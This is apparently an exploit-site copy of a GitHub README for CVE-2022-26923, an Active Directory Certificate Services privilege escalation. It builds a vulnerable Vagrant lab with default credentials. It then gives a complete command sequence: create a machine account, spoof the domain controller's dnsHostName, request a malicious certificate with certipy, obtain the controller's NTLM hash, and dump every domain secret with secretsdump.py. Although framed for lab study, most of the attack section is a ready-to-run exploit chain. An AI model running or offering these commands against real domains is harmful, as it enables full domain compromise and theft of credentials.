Share 
## https://sploitus.com/exploit?id=FA811B45-59A5-57A9-99DB-1C2ACB2634AA
# CVE-2022-26923
## Description
This vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed.

It is mainly related to the Active Directory Certificate Services (AD CS) role. The AD CS role is a Windows Server role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization. The AD CS role is used to issue certificates for users, computers, and services.
## Table of Contents
- [CVE-2022-26923](#cve-2022-26923)
    - [Description](#description)
    - [Table of Contents](#table-of-contents)
    - [Prerequisites](#prerequisites)
    - [Environment](#environment)
    - [Exploit](#exploit)
    - [Proof of Concept](#proof-of-concept)
    - [References](#references)

## Prerequisites
- [Vagrant](https://www.vagrantup.com/downloads)
- [VirtualBox](https://www.virtualbox.org/wiki/Downloads)

## Environment
The Windows Server version used is **Windows Server 2019** Standard Evaluation which is the vulnerable version.
The provided Vagrantfile (in the folder Vulnerable Machine) will create a Windows Server 2019 VM with the AD CS role installed and configured, along with a low privileged user with the following credentials:
- Username: `user`
- Password: `V@grant1`

To create the environment, follow these steps:
 - First clone the repository and go to the `CVE-2022-26923` directory:
    ```bash
    git clone https://github.com/Gh-Badr/CVE-2022-26923
    cd CVE-2022-26923
    ```
- If you need to change the default IP address, you can do it in the `Vagrantfile` by replacing the IP address in the following line:
    ```ruby
    config.vm.network "private_network", type: "static", ip: "192.168.33.13"
    ```
- Then run the following command to create the VM:
    ```bash
    cd 'Vulnerable Machine'
    vagrant up
    ```
- If you don't have linux machine with `certipy` installed, you can use the provided vagrant machine in the directory `Attacker Machine` by running the following command:
    ```bash
    cd 'Attacker Machine'
    vagrant up
    ```
The folder `Attacker Machine` contains a vagrant machine along with a shell script that will install the latest version of `certipy`. You can also use the script to install `certipy` on your linux machine.


## Exploit

In order to connect to the attacker machine, run the following command from the `Attacker Machine` directory:
```bash
vagrant ssh
```

Now that you are in the attacking machine, you need to add the IP address of the Windows Server to the `hosts` file:
```bash
echo "192.168.33.13   VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts
```
**Note**: If you changed the IP address in the `Vagrantfile` of the vulnerable machine, you need to change it here too.

Then, let's create a new computer account in the domain:
```bash
addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'
```

To verify that the computer account has been created, connect to the vulnerable machine with the `user` and the password `V@grant1` by running the following command from the `Vulnerable Machine` directory:
```bash
vagrant ssh
```

Then, run the following command to verify that the computer account has been created:
```powershell
Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName
```

This machine account has the dnsHostName `CVEPC.vagrant.local`. What we want is to change this dnsHostName to `VAGRANT-K51B6U3.vagrant.local` which is the domain controller.

To do so, we need to first delete the Service Principal Name (SPN) from the computer account `CVEPC` by running the following command:
```powershell
Set-ADComputer CVEPC -Properties ServicePrincipalName @{}
```

Then we can change the dnsHostName to `VAGRANT-K51B6U3.vagrant.local` by running the following command:
```powershell
Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
```

- Note: To understand why we had to delete the computer account SPN, you can refer to the project [Report](https://github.com/Gh-Badr/CVE-2022-26923/blob/main/Rapport%20CVE_2022_26923.pdf) (**In french**). Or you can check the first article in the references section which contains a detailed explanation by the author of the CVE.

Now that we have a computer account with the dnsHostName `VAGRANT-K51B6U3.vagrant.local`, we can request a malicious certificate from the vulnerable machine by running the following command on the attacking machine:
```bash
certipy req -username 'CVEPC$@vagrant.local' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local
```

You should get a certificate called `vagrant-k51b6u3.pfx` in the current directory.
To check that the certificate is valid, you use the `auth` tool of `certipy` by running the following command:
```bash
certipy auth -pfx vagrant-k51b6u3.pfx
```
If the certificate is valid, you should get the NTLM hash of the domain controller. Which can be used in many malicious ways.

## Proof of Concept
As a proof of concept, we can use the NTLM hash to retrieve all the secrets stored in the domain (as explained in the article of the author of the CVE). To do so, we can use the tool `secretsdump.py` from the impacket suite (which is installed with the latest version of `certipy`).

To use the tool, run the following command:
```bash
secretsdump.py 'vagrant.local/vagrant-k51b6u3$@vagrant-k51b6u3.vagrant.local' -hashes :<NTLM hash>
```
Replace `<NTLM hash>` with the NTLM hash that you got from the previous step.

As a result, you should get all the secrets stored in the domain.


## References
- [Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4)
- [GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services](https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services) 
- [Try Hack Me - CVE-2022-26923](https://tryhackme.com/room/cve202226923)